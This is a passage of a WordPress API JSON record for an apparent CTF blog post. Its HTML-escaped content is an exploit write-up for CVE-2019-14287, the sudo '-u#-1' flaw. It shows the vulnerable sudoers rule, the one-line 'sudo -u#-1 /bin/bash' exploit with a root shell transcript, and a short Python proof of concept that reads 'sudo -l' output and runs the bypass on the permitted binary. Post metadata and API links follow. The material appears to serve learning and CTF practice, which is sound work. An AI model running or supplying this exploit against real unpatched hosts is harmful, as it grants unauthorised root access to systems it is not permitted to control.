Linux\n# Credit : Joe Vennix from Apple Information Security found and analyzed the bug\n# Fix : The bug is fixed in sudo 1.8.28\n# CVE : 2019-14287\n\n&#039;&#039;&#039;Check for the user 
sudo permissions\n\nsudo -l \n\nUser hacker may run the following commands on kali:\n    (ALL, !root) \/bin\/bash\n\nSo user hacker can&#039;t run \/bin\/bash as root (!root)\n\nUser hacker sudo privilege in \/etc\/sudoers\n\n# User privilege specification\nroot    ALL=(ALL:ALL) ALL\n\nhacker ALL=(ALL,!root) \/bin\/bash\n\nWith ALL specified, user hacker can run the binary \/bin\/bash as any user\n\nEXPLOIT: \n\nsudo -u#-1 \/bin\/bash\n\nExample : \n\nhacker@kali:~$ sudo -u#-1 \/bin\/bash\nroot@kali:\/home\/hacker# id\nuid=0(root) gid=1000(hacker) groups=1000(hacker)\nroot@kali:\/home\/hacker#\n\nDescription :\nSudo doesn&#039;t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv\n-u#-1 returns as 0 which is root&#039;s id\n\nand \/bin\/bash is executed with root permission\nProof of Concept Code :\n\nHow to use :\npython3 sudo_exploit.py\n\n&#039;&#039;&#039;\n\n#!\/usr\/bin\/python3\n\nimport os\n\n#Get current username\n\nusername = input(&quot;Enter current username :&quot;)\n\n#check which binary the user can run with sudo\n\nos.system(&quot;sudo -l &gt; priv&quot;)\n\nos.system(&quot;cat priv | grep &#039;ALL&#039; | cut -d &#039;)&#039; -f 2 &gt; binary&quot;)\n\nbinary_file = open(&quot;binary&quot;)\n\nbinary= binary_file.read()\n\n#execute sudo exploit\n\nprint(&quot;Lets hope it works&quot;)\n\nos.system(&quot;sudo -u#-1 &quot;+ binary)\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Choc Information gathering Port scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc] \u2514\u2500$ sudo nm 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-876","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/876","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=876"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/876\/revisions"}],"predecessor-version":[{"id":877,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/876\/revisions\/877"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=876"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}